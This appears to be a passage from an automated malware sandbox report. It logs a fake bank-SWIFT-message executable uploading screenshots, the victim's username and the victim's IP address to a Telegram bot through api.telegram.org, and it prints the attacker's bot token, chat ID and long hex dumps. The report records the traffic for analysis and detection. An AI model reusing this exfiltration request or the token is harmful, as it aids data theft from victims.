20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1f0320b05feb
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 30 33 32 30 62 30 35 66 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1f0320b05febContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:51 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:53 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:52 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.549889149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:55 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd20fa5dde6e74
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 66 61 35 64 64 65 36 65 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd20fa5dde6e74Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
